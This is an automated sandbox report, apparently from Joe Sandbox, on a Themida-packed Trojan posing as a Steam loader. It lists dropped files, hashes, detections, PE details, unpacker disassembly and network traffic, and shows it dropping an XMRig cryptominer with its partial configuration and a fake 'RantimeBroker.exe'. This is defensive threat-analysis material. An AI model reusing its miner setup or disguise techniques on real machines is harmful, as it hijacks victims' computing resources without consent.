                                                                          SecuriteInfo.com.Trojan.GenericKD.45210505.14650.exeGet hashmaliciousBrowse
                                                                            j5JXKdDORp.exeGet hashmaliciousBrowse
                                                                              miner.exeGet hashmaliciousBrowse
                                                                                mCiZXEeKax.exeGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Bulz.242344.9747.exeGet hashmaliciousBrowse
                                                                                    ara.exeGet hashmaliciousBrowse
                                                                                      araiki.exeGet hashmaliciousBrowse
                                                                                        arailk.exeGet hashmaliciousBrowse
                                                                                          7YI2Cl6hM2.exeGet hashmaliciousBrowse
                                                                                            FuESM9LiMN.exeGet hashmaliciousBrowse
                                                                                              in6.ps1Get hashmaliciousBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RantimeBroker.exe.log
                                                                                                Process:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):226
                                                                                                Entropy (8bit):5.3467126928258955
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                                                MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                                                SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                                                SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                                                SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.log
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.35816127824051
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                                                                MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                                                                SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                                                                SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                                                                SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                                                                Malicious:true
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                                                                C:\Users\user\AppData\Local\pg2bsuqa.exe
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4964504
                                                                                                Entropy (8bit):7.901098351320417
                                                                                                Encrypted:false
                                                                                                SSDEEP:98304:3Fo69yX+tlgGpThihQhFGooC309rxysgTNmYZHxgXVh:3vwweGfU4Uoz3YrxysghN1+j
                                                                                                MD5:70DCA411445D3B4394D9C467BF3FF994
                                                                                                SHA1:83F9120B2B184EB991D1DCBF4BB13D5F2F4A6097
                                                                                                SHA-256:1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
                                                                                                SHA-512:4A2F84A8FB4BB0EBA8402EB417CADB8BCEF6AC309EE4918A698CAB756EA888FF076545E1ED02F85F5705FE15F7EB7EC01B68C3BC98F74B4E13F5B8E4F0184CD6
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: 1vuet1S3tI.exe, Detection: malicious, Browse
                                                                                                • Filename: 8WjU4jrBIr.exe, Detection: malicious, Browse
                                                                                                • Filename: 8TD8GfTtaW.exe, Detection: malicious, Browse
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C................0.. ..........\d... ...@....@.. .............................d.K...@.................................0L..d........?............K..............................................................`..P........................... . ... ...................... ..` O....@......................@..@ ............................@..@.idata... ..........................@....apk0....@... ......................@..@.themida..(..`......................`....boot.........9.....................`..`.apk1....2....G.....................`..`.apk2... YE.. Z..\E.................`..`.reloc...............`E.............@..@.rsrc....?.......@...hE.............@..@........................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2611424
                                                                                                Entropy (8bit):7.959583416242755
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
                                                                                                MD5:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                SHA1:4E0FBC13AF6C373C9944A53A40965517B619C274
                                                                                                SHA-256:83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
                                                                                                SHA-512:83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: 1vuet1S3tI.exe, Detection: malicious, Browse
                                                                                                • Filename: 8WjU4jrBIr.exe, Detection: malicious, Browse
                                                                                                • Filename: 8TD8GfTtaW.exe, Detection: malicious, Browse
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):14544
                                                                                                Entropy (8bit):6.2660301556221185
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: 1vuet1S3tI.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.Variant.Zusy.368685.25375.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.Variant.Zusy.368685.25618.exe, Detection: malicious, Browse
                                                                                                • Filename: 8WjU4jrBIr.exe, Detection: malicious, Browse
                                                                                                • Filename: 8TD8GfTtaW.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.Trojan.MinerNET.8.3277.exe, Detection: malicious, Browse
                                                                                                • Filename: nazi.exe, Detection: malicious, Browse
                                                                                                • Filename: 888888.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.Trojan.GenericKD.45210505.14650.exe, Detection: malicious, Browse
                                                                                                • Filename: j5JXKdDORp.exe, Detection: malicious, Browse
                                                                                                • Filename: miner.exe, Detection: malicious, Browse
                                                                                                • Filename: mCiZXEeKax.exe, Detection: malicious, Browse
                                                                                                • Filename: SecuriteInfo.com.Variant.Bulz.242344.9747.exe, Detection: malicious, Browse
                                                                                                • Filename: ara.exe, Detection: malicious, Browse
                                                                                                • Filename: araiki.exe, Detection: malicious, Browse
                                                                                                • Filename: arailk.exe, Detection: malicious, Browse
                                                                                                • Filename: 7YI2Cl6hM2.exe, Detection: malicious, Browse
                                                                                                • Filename: FuESM9LiMN.exe, Detection: malicious, Browse
                                                                                                • Filename: in6.ps1, Detection: malicious, Browse
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Windows\CPU\config.json
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):2275
                                                                                                Entropy (8bit):3.9887353957446137
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:CtWTHcfLWHW8b9b2lZ9lDfnncC519ECoECyo12udQdJtK59:CtWTGyHocCOCZCN2uYOH
                                                                                                MD5:DF3803B8B18481FBC63A8E2CECF22500
                                                                                                SHA1:B44877D6F781A28F1AD3F0CC337C9C3CC7BFFD96
                                                                                                SHA-256:B60A267608EA13830BFE41C7EE0F726A6562855112CF2310332DAD43854E370A
                                                                                                SHA-512:8FAB13258B597C5363C727A3208426A17DC1D66AAEBEE4977B2B5C8EB4044F09626167A75E69831A45095CA2B8CFAAA57ECA6FEA93A643F43266943765F7538D
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, Author: Joe Security
                                                                                                Preview: {. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "astrobwt-max-size": 550,. "cn/0": false,. "cn-lite/0": false,. "kawpow": false. },. "opencl": {. "enabled": fal
                                                                                                C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):6889640
                                                                                                Entropy (8bit):7.882305690463656
                                                                                                Encrypted:false
                                                                                                SSDEEP:196608:1YWVn8cTUWrpYpHqtbxxfDpidYLDH+D1W+4vYz3RVB:1YW2aJrpOHqtb4dYLDHtvY1j
                                                                                                MD5:E95F766A3748042EFBF0F05D823F82B7
                                                                                                SHA1:FA4A29F9B95F4491E07EBA54A677D52D8D061A19
                                                                                                SHA-256:1AEF2FBA4058AD80E4AE16DCE0D2609E9F946BA9A4F2203891A26A92B3F6578C
                                                                                                SHA-512:E4D61199B57AE189C2BEF7ADC661224CFB00E9D6B3526C07624911238AAD2D81D9548B52DB1C6DBBF4A0E3F766D57080D2414CA836E037F0BB39728D1F1AF55C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......p|v.4...4...4...ou......ou..9...ou.........0....l..'....l..>....l.......o..&...ou..!...4...k....l..+....o.......o.......o..0....o.5...4...5....o..5...Rich4...................PE..d......`..........".......1...r......R.........@....................................cji...`............................................................o.1.@.........i............. .......................0u..h...0...8............p..h............................text.....1......................... ..`.rdata.......1.....................@..@.data....@+..0D.....................@....pdata........o.....................@..@_RANDOMX......q.....................@..`_SHA3_25@.....q.....................@..`_TEXT_CN......q.....................@..`_TEXT_CN......q.....................@..`_RDATA........q.....................@..@0.............q.....................`..`1.......P?c......@c.............
                                                                                                C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2611424
                                                                                                Entropy (8bit):7.959583416242755
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
                                                                                                MD5:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                SHA1:4E0FBC13AF6C373C9944A53A40965517B619C274
                                                                                                SHA-256:83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
                                                                                                SHA-512:83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                C:\Users\user\AppData\Roaming\Windows\cpu.zip
                                                                                                Process:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                Category:dropped
                                                                                                Size (bytes):6296834
                                                                                                Entropy (8bit):7.9998772929856505
                                                                                                Encrypted:true
                                                                                                SSDEEP:196608:EYt1C1WmUAsFnYtr+h3HbZe18JZPSXpzCC9o:EYMWDFnor+h3o18JZP8Po
                                                                                                MD5:E9695400A2205B4F8ECEB8B635BE7AA1
                                                                                                SHA1:9071EF76AABFD7A05F7470460C4D92D89D4D2668
                                                                                                SHA-256:66F209A9972C6E1A88E572697425A936A5DC028B2D8BC29FDDACA98FF25434B4
                                                                                                SHA-512:5EDDF9D73675E327141B820ABBBC98336DE991D50AD5D30AA15F41DF10BBB9F0E47FFD57F8600F6B5CE0E319D463F9D40EF88E9D11C884121D56B2677E91E25A
                                                                                                Malicious:false
                                                                                                Preview: PK.........z:Rgw..............config.json.V.n.0...+..C.v...-@rKQ iQ.Ea.....C.K..{Iy.D.E...C...=>.?W..*.......3.2<.V...x.,NP.<.....v...,4..K..{.jr>.....h.~...Z...{&.....Vh.i1:.J..U.[.....5...u.rU1.&.WH..n..h.......l......fh...NS..2.....?...B...........Y..q..r.L......^...e\b...xN..J.^:.$d.Vx..EL.T>.'....O."V~w.4...%.x;.:....5#.N..D&.. .\s..\....X...<<.b.E....(.l.).q..4B+.Yl..K.#08..h.~m.u.q.#MP"g.....Q....]?[.......[..T[.k._"j....S...B..c...L...-.v..4Ub.4.x.1.c..?..e......]../.I.<.r$u`3ZOG.U5..|x.."].:..o..<..><......=.?=.K-...@./N.?...X...J&...Vk.._j...;.......M.ly_..j%..`.Dp$Wn.wt.."....q.........WM..C..5....e..q.a.u.n..>...zV.s!...{m..$....D.y.|..N+....E....A.0]....D.R..Ar.E...u2....)5T.SJ.....yw*..PK........T"URu.G.$._.. i.....cpu.exe.Zg8...^......%.-....[..;W.. ....DY..e.%......6..\............y..s.o.9.e..........5....C...s......u....F9.4G9...}..=.....p..O_v.{vo?.vg.v%..vwO;{a22b.?...~.Y..1.O_O?.H.[....V.F^bdU.R.=.|...y.V2G..J..".,.d...3E

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.954859029987119
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
                                                                                                File size:2817248
                                                                                                MD5:bc584a3be92cfdfda79446372fffa46d
                                                                                                SHA1:6f7d11b7c795bd1f48a078f05d8a4c5600448a03
                                                                                                SHA256:8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6
                                                                                                SHA512:39c3bbdc8e063373bf1f2358c6d264db41622a2447308edf6d01c558ff301103dbec7e0fc8970ad4822ff05a4d12d3cefb14d39736b8913886e076126d596160
                                                                                                SSDEEP:49152:Wex6LbJrFJH/6tF6kzGTjl1UNhnbDtFREyJW0rHcwBczszXo2kH9hbECVosGOb:WF9FN6tFIx1UNhbr30Y02kH7bRVosN
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...../`.....................2......X.H.. ...@....@.. .......................`s.....:++...@................................

                                                                                                File Icon

                                                                                                Icon Hash:6863eee6b292c6ee

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x88e058
                                                                                                Entrypoint Section:.boot
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                                Time Stamp:0x602F9D0C [Fri Feb 19 11:12:12 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:4328f7206db519cd4e82283211d98e83

                                                                                                Authenticode Signature

                                                                                                Signature Valid:false
                                                                                                Signature Issuer:CN=DigiCert High Assurance Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                Error Number:-2146869232
                                                                                                Not Before, Not After
                                                                                                • 6/1/2017 5:00:00 PM 7/8/2020 5:00:00 AM
                                                                                                Subject Chain
                                                                                                • CN=Kaspersky Lab, O=Kaspersky Lab, L=Moscow, C=RU
                                                                                                Version:3
                                                                                                Thumbprint MD5:D47ED7012E116270A767DA88438C3BA6
                                                                                                Thumbprint SHA-1:3C92C9274AB6D3DD520B13029A2490C4A1D98BC0
                                                                                                Thumbprint SHA-256:3606C42F2608526263AC61997AA0A83B364FB23A6882447CA787B5A5790115D8
                                                                                                Serial:0F9D91C6ABA86F4E54CBB9EF57E68346

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                call 00007FA770C14E20h
                                                                                                push ebx
                                                                                                mov ebx, esp
                                                                                                push ebx
                                                                                                mov esi, dword ptr [ebx+08h]
                                                                                                mov edi, dword ptr [ebx+10h]
                                                                                                cld
                                                                                                mov dl, 80h
                                                                                                mov al, byte ptr [esi]
                                                                                                inc esi
                                                                                                mov byte ptr [edi], al
                                                                                                inc edi
                                                                                                mov ebx, 00000002h
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jnc 00007FA770C14CBCh
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jnc 00007FA770C14D23h
                                                                                                xor eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jnc 00007FA770C14DB7h
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                je 00007FA770C14CDAh
                                                                                                push edi
                                                                                                mov eax, eax
                                                                                                sub edi, eax
                                                                                                mov al, byte ptr [edi]
                                                                                                pop edi
                                                                                                mov byte ptr [edi], al
                                                                                                inc edi
                                                                                                mov ebx, 00000002h
                                                                                                jmp 00007FA770C14C6Bh
                                                                                                mov eax, 00000001h
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc eax, eax
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jc 00007FA770C14CBCh
                                                                                                sub eax, ebx
                                                                                                mov ebx, 00000001h
                                                                                                jne 00007FA770C14CFAh
                                                                                                mov ecx, 00000001h
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                adc ecx, ecx
                                                                                                add dl, dl
                                                                                                jne 00007FA770C14CD7h
                                                                                                mov dl, byte ptr [esi]
                                                                                                inc esi
                                                                                                adc dl, dl
                                                                                                jc 00007FA770C14CBCh
                                                                                                push esi
                                                                                                mov esi, edi
                                                                                                sub esi, ebp

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa03a0x50.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x2ef0.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x2ac6000x36e0.themida
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                0x20000x20000xa00False0.953515625data7.58163620158IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                0x40000x2eea0x1200False0.989800347222data7.85588670463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                0x80000xc0x200False0.583984375data4.24912721916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                .idata0xa0000x20000x200False0.16796875data1.0588173124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xc0000x30000x3000False0.361735026042data4.82035959286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .themida0x100000x47e0000x0unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .boot0x48e0000x2a72000x2a7200unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_ICON0xc1bc0x668data
                                                                                                RT_ICON0xc8340x2e8data
                                                                                                RT_ICON0xcb2c0x128GLS_BINARY_LSB_FIRST
                                                                                                RT_ICON0xcc640xea8dBase III DBT, version number 0, next free block index 40, 1st item "ff3"
                                                                                                RT_ICON0xdb1c0x8a8dBase III DBT, version number 0, next free block index 40, 1st item "ff3"
                                                                                                RT_ICON0xe3d40x568GLS_BINARY_LSB_FIRST
                                                                                                RT_GROUP_ICON0xe94c0x5adata
                                                                                                RT_VERSION0xe9b80x338data
                                                                                                RT_MANIFEST0xed000x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminatorsEnglishUnited States

                                                                                                Imports

                                                                                                DLLImport
                                                                                                kernel32.dllGetModuleHandleA
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                Translation0x0000 0x04b0
                                                                                                LegalCopyrightCopyright (c) ZSqUZ_KBGbBDgyy 2020
                                                                                                Assembly Version1.1.2.9
                                                                                                InternalNameLoader.exe
                                                                                                FileVersion0.0.4.6
                                                                                                CompanyNameLaunchy
                                                                                                Commentshxz7ffDbexNxYlZ
                                                                                                ProductNameSteam
                                                                                                ProductVersion0.0.4.6
                                                                                                FileDescription1xLYZusZUdU4_qG
                                                                                                OriginalFilenameLoader.exe

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Feb 23, 2021 17:37:24.187273979 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.258213043 CET4434971988.99.66.31192.168.2.5
                                                                                                Feb 23, 2021 17:37:24.258388042 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.342503071 CET49719443192.168.2.588.99.66.31
                                                                                                Feb 23, 2021 17:37:24.413574934 CET4434971988.99.66.31192.168.2.5
